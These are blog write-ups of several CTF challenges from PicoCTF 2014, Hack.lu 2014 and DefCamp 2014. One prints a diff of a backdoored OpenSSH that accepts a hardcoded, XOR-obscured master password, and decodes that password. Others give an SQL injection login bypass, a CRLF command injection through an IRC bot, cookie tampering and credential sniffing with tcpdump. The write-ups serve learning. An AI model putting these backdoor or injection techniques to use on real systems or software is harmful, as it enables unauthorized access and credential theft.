PicoCTF 2014

Pico CTF 2014 finished up last week. It was a nice CTF running for about 2 weeks. This CTF was designed for middle and high school students. Challenges started out fairly easy compared to your average CTF but did get harder as you went along. I dare say many of the 100 plus point challenges are on par with many other CTF challenges.  Below I am going to include some quick writeup. Their were a huge number of challenges and my team was in and out of the CTF as time permits and since we could not be ranked was not a high priority. The write ups below are just the ones I personally did my team completed many more.

 

SSH BACK DOOR – 100

Some hackers have broken into my server backdoor.picoctf.com and locked my user out (my username is jon). I need to retrieve the flag.txt file from my home directory.
The last thing we noticed in out network logs show is the attacker downloading this. Can you figure out a way to get back into my account?

ssh jon@backdoor.picoctf.com
The authenticity of host ‘backdoor.picoctf.com (23.21.109.77)’ can’t be established.
ECDSA key fingerprint is 6d:3c:3a:7f:3e:04:97:85:84:78:83:d8:52:05:79:4e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘backdoor.picoctf.com,23.21.109.77’ (ECDSA) to the list of known hosts.
jon@backdoor.picoctf.com’s password:
download original tar.gz and run diff
diff hack orginginal/
diff hack/auth.c orginginal/auth.c
777,794d776
<
< static int frobcmp(const char *chk, const char *str) {
< int rc = 0;
< size_t len = strlen(str);
< char *s = xstrdup(str);
< memfrob(s, len);
<
< if (strcmp(chk, s) == 0) {
< rc = 1;
< }
<
< free(s);
< return rc;
< }
<
< int check_password(const char *password) {
< return frobcmp(“CGCDSE_XGKIBCDOY^OKFCDMSE_XLFKMY”, password);
< }
diff hack/auth.h orginginal/auth.h
214,215d213
< int check_password(const char *);
<
diff hack/auth-passwd.c orginginal/auth-passwd.c
115,117d114
< if (check_password(password)) {
< return ok;
< }

after much google and talks with teammates I found an explanation to the frobcmp function

The memfrob() function encrypts the first n bytes of the memory area s by exclusive-ORing each character with the number 42. The effect can be reversed by using memfrob() on the encrypted memory area.
Note that this function is not a proper encryption routine as the XOR constant is fixed, and is only suitable for hiding strings.

so convert each letter in the password to decimal
XOR with 42
and convert back to ascii

original
CGCDSE_XGKIBCDOY^OKFCDMSE_XLFKMY
decimal version
67 71 67 68 83 69 95 88 71 75 73 66 67 68 79 89 94 79 75 70 67 68 77 83 69 95 88 76 70 75 77 89
xor with 42
105 109 105 110 121 111 117 114 109 97 99 104 105 110 101 115 116 101 97 108 105 110 103 121 111 117 114 102 108 97 103 115
converted to ascii
i m i n y o u r m a c h i n e s t e a l i n g y o u r f l a g s
final ssh password
iminyourmachinestealingyourflags

login as jon via ssh and get flag
~/CTF/2014-picoctf/write right# ssh jon@backdoor.picoctf.com
jon@backdoor.picoctf.com’s password:
Last login: Wed Oct 29 01:16:37 2014 from pool-74-102-33-54.nwrknj.fios.verizon.net
jon@ip-10-45-162-116:~$ ls
flag.txt
jon@ip-10-45-162-116:~$ cat flag.txt
ssshhhhh_theres_a_backdoor
jon@ip-10-45-162-116:~$

 

Redacted – 50

You found a letter that may shed light on recent events.

Lets look at meta data

<original image>https://picoctf.com/problem-static/forensics/redacted/Redacted.pdf

exiftool Redacted.pdf
ExifTool Version Number : 8.60
File Name : Redacted.pdf
Directory : .
File Size : 879 kB
File Modification Date/Time : 2014:10:27 12:10:11-04:00
File Permissions : rw-r–r–
File Type : PDF
MIME Type : application/pdf
PDF Version : 1.3
Linearized : No
XMP Toolkit : XMP Core 5.4.0
Thumbnail Image : (Binary data 12625 bytes, use -b option to extract)
Thumbnail Width : 212
Thumbnail Height : 256
Thumbnail Format : JPEG
Metadata Date : 2014:10:25 16:28:24-04:00
Creator Tool : Adobe Illustrator CC 2014 (Macintosh)
Derived From Rendition Class : proof:pdf
Derived From Document ID : xmp.did:1b6690ed-28a8-c141-9479-b6a9cf6be651
Derived From Instance ID : uuid:d1c078a0-2746-42b2-b0d1-25aedff8fb1e
Derived From Original Document ID: uuid:5D20892493BFDB11914A8590D31508C8
Version ID : 1
Instance ID : uuid:4ab06236-d455-3341-afad-bba7a24d434b
History Software Agent : Adobe Illustrator CC 2014 (Macintosh)
History Changed : /
History When : 2014:10:25 16:28:15-04:00
History Instance ID : xmp.iid:533d6706-603a-42d6-978a-a21cc3522efd
History Action : saved
Document ID : xmp.did:533d6706-603a-42d6-978a-a21cc3522efd
Rendition Class : proof:pdf
Manifest Link Form : EmbedByReference
Manifest Reference Document ID : 0
Manifest Reference Instance ID : 0
Manifest Reference File Path : /Users/ryan/Desktop/Redacted1.png
Ingredients Document ID : 0
Ingredients Instance ID : 0
Ingredients File Path : /Users/ryan/Desktop/Redacted1.png
Original Document ID : uuid:5D20892493BFDB11914A8590D31508C8
N Pages : 1
Swatch Groups Group Name : Brights
Swatch Groups Group Type : 1
Swatch Groups Colorants Yellow : 0.003100
Swatch Groups Colorants Mode : CMYK
Swatch Groups Colorants Black : 0.003100
Swatch Groups Colorants Swatch Name: C=60 M=90 Y=0 K=0
Swatch Groups Colorants Cyan : 60.000000
Swatch Groups Colorants Magenta : 90.000000
Swatch Groups Colorants Type : PROCESS
Has Visible Transparency : False
Plate Names : Cyan, Magenta, Yellow, Black
Max Page Size W : 612.000000
Max Page Size H : 792.000000
Max Page Size Unit : Pixels
Has Visible Overprint : False
Format : application/pdf
Startup Profile : Print
GTS PDFX Version : PDF/X-1:2001
GTS PDFX Conformance : PDF/X-1a:2001
Trapped : False
Page Count : 1
Title : Redacted2
Producer : Mac OS X 10.9.5 Quartz PDFContext
Creator : Adobe Illustrator CC 2014 (Macintosh)
Create Date : 2014:10:25 20:30:54Z
Modify Date : 2014:10:25 20:30:54Z
Looks like this was originally an adobe illustrator document

Lets see if we can pull out the images

pdfimages -j Redacted.pdf out

<clean image>

there it is the secret one_two_three_four

 

Intercepted Post – 40

We intercepted some of your Dad’s web activity. Can you get a password from his traffic?. You can also view the traffic on CloudShark.

<packet image>

found
flag%7Bpl%24_%24%24l_y0ur_l0g1n_form%24%7D
doesnt work. convert from ascii character codes.
flag{pl$_$$l_y0ur_l0g1n_form$}

complete

Delicious! – 60

You have found the administrative control panel for the Daedalus Coperation Website: https://web.picoctf.com/delicious-5850932/login.php. Unfortunately, it requires that you be logged in. Can you find a way to convince the web site that you are, in fact, logged in?

page displays

Welcome! You’ve been here before.
Your session number is 67.
We’ll be tracking you using this number whenever you visit this site.
You’re not logged in. There are currently too many users logged in, so you will have to come back later to log in.
use burp suite to edit cookies and send with repeater. tried many 65 was the key.

< burp image>

Flag is session_cookies_are_the_most_delicious

 

Function Address – 60

We found this program file on some systems. But we need the address of the ‘find_string’ function to do anything useful! Can you find it for us?

open file with objdump and grep for function

objdump -d problem | grep find_string
08048444 <find_string>:
8048496: eb 29 jmp 80484c1 <find_string+0x7d>
80484b6: 75 05 jne 80484bd <find_string+0x79>
80484bb: eb 1a jmp 80484d7 <find_string+0x93>
80484d0: 7d c6 jge 8048498 <find_string+0x54>
8048511: e8 2e ff ff ff call 8048444 <find_string>
flag is 08048444

 

snapchat – 80

It was found that a Daedalus employee was storing his personal files on a work computer. Unfortunately, he corrupted the filesystem before we could prove it. Can you take a look? Download here.
recover data

foremost -i disk.img -o file.img
Processing: disk.img
|*|
root@kali:~/CTF/2014-picoctf/snapcat# ls
disk.img file.img output test
root@kali:~/CTF/2014-picoctf/snapcat# file file.img/
file.img/: directory
root@kali:~/CTF/2014-picoctf/snapcat# cd file.img/
root@kali:~/CTF/2014-picoctf/snapcat/file.img# ls
audit.txt jpg
root@kali:~/CTF/2014-picoctf/snapcat/file.img# cat audit.txt
Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
Audit File

Foremost started at Mon Oct 27 20:23:29 2014
Invocation: foremost -i disk.img -o file.img
Output directory: /root/CTF/2014-picoctf/snapcat/file.img
Configuration file: /etc/foremost.conf
——————————————————————
File: disk.img
Start: Mon Oct 27 20:23:29 2014
Length: 5 MB (5242880 bytes)

Num Name (bs=512) Size File Offset Comment

0: 00000057.jpg 89 KB 29184
1: 00000237.jpg 13 KB 121344
2: 00000265.jpg 172 KB 135680
3: 00000613.jpg 34 KB 313856
4: 00000685.jpg 56 KB 350720
Finish: Mon Oct 27 20:23:29 2014

5 FILES EXTRACTED

jpg:= 5
——————————————————————

Foremost finished at Mon Oct 27 20:23:29 2014
root@kali:~/CTF/2014-picoctf/snapcat/file.img# ls
audit.txt jpg
root@kali:~/CTF/2014-picoctf/snapcat/file.img# cd jpg/
root@kali:~/CTF/2014-picoctf/snapcat/file.img/jpg# ls
00000057.jpg 00000237.jpg 00000265.jpg 00000613.jpg 00000685.jpg
root@kali:~/CTF/2014-picoctf/snapcat/file.img/jpg#

00000237

Injection1 – 90

Daedalus Corp. has been working on their login service, using a brand new SQL database to store all of the access credentials. Can you figure out how to login?

terminate SQL request with ‘# to bypass ( must be mysql )

use login:
admin’ #

error returns flag

Logged in!

Your flag is: flag_vFtTcLf7w2st5FM74b

 

PNG or Not? – 100

On a corner of the bookshelf, you find a small CD with an image file on it. It seems that this file is more than it appears, and some data has been hidden within. Can you find the hidden data?

image

run strings on image nothing important. Look at image via hex editor see proper PNG header and end. But more data after. Notice some flag.txt in the text

<hex editor image>

also notice 7z looks like a compressed file on the end.
tail end data off into another file and extract.
tail -c 138 image.png > test.7z

file test.7z
test.7z: 7-zip archive data, version 0.3

7z x test.7z

7-Zip [64] 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18
p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,1 CPU)

Processing archive: test.7z

Extracting flag.txt

Everything is Ok

Size: 20
Compressed: 138
ls
flag.txt image.png test.7z
cat flag.txt
EKSi7MktjOpvwesurw0

 

 

 

Hack.lu 2014

This week my CTF team OverFlowSecurity was able to compete in hack.lu. This CTF seems to be very run and very challenging. Since this event was not over a weekend most our team could not commit a lot of time to it. We finished at a very respectable 80th place. I myself only concentrated on a single challenge based on an IRC bot. I actually learned a lot about how the IRC protocol works and in the end one of my teammates solved the challenge with our combined efforts. Below is a quick write up of the challenge. Next up for me is the PicoCTF in a week or so. It’s a long running (2 week) challenge.

 

Barmixing-Bot
by freddy (Misc)
200 (+80) Points

 

There’s a fun and quirky IRC bot to play with. It responds to commands in private chat but also in #hacklu-saloon on freenode. We think it’s involved in a devious scheme that distracts people to get their money pickpocketed. So be careful!

Bot was on an irc channel. Using !help in the channel or private message to bot gives you the list of commands accepted.

<barmixing-bot> Send messages to the bot or the channel starting with an exclamation mark. Known commands are list, status, karma, math, base64, base64d, rot13, ping, hack, request, list

Play around with commands for a while nothing of great interest. Using !base64 with a lot of characters showed it split the line into 2 lines. Spend some time on this.

Noticed that the bot is in a channel called #hacklu-secret-channel. This channel is invite only. So at this point I figured the goal was to get into this channel.

 

Also noticed this with the !rot13 function. Created a rot13 encoded string to send /invite H1tch #hacklu-secret-channel but this was just sent to the channel command not actually issued. Resorted to reading the RFC for IRC.

After reading docs and discussing my teammate suggested maybe we need to send the raw IRC commands to the bot. We had already been experimenting with the !base64d function that decoded base64 so we gave that a shot.

 

Encoded

aaa\r\nINVITE h1tch #hacklu-secret-channel

and sent to the bot via

!base64d YWFhXHJcbklOVklURSBoMXRjaCAjaGFja2x1LXNlY3JldC1jaGFubmVs

An invite was received by the bot and we were able to obtain the flag from the channel subject.

Flag GfeBNmN5XjwDvQB64qoqaEEeYogk4rGH3ikZ0qtc3B3HKLDoAH

DefCamp 2014 – Quest 100 –

or this My password is password but it is 2_*_10_*_16_*_8_*_4 characters long. Whats my password ? Ha ha ha!

This one I didn’t catch onto until almost the end when I had a doh moment.

The flag is the word password in MD5

 

flag: 5f4dcc3b5aa765d61d8327deb882cf99

DefCamp 2014 – Network 100 –

You were given an IP address and a HINT similar to guests are always allowed but the manager has a secret what is it.

SSH access was open for user guest password guest.

Once in you see a toolkit directory with tcpdump in it.

tcpdump -l -A | egrep -i ‘secret’
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
user=manager&pass=asecret
user=manager&pass=topsecretmanagerpassword
The secret is behind <strong>0f388689dc4728cfde0de9a1ee47c8d3</strong>. Don’t tell anyone!

an MD5 of  0f388689dc4728cfde0de9a1ee47c8d3 gives you the flag

FLAG:  ididyourmom

DefCamp 2014

overflow-bunny

Overflowsec
()_() (=’.’=) (>_<) () ()

 

Had a great time this weekend during DefCamp 2014. This was by third CTF and the first I was able to dedicated the required amount of time to. I participated with a great group of guys under the OverFlowsec team flag. Or bunny rabbit in this case. The teams were limited to 5 and I was happy to fill one of those slots. Overall we finished 36th out of a 600 teams so I feel pretty good about that.

 

The CTF seemed to be well run not a lot of issues overall. There were a few glitches here an there like other teams deleting parts of a challenge to prevent others from obtaining the flag and a machine or two that had some stability issues. This was a jeopardy style CTF that required a VPN to access the target machines. There were 20 challenges with 2 additional bonus challenges later in the event. We were able to take down all but 8. The categories were Quest, Web, Network, Exploit, Misc, and Bonus. Although these categories seem to be more of a guideline for example one of the network challenges I would consider more web and there were lots of other overlaps.

 

Overall a great CTF and a great learning experience for me. I would like to thank the organizers and the guys over OverFlowSec for putting up with me. I will post a couple write-ups to some of the challenges that I actually took some notes on.

Previous Page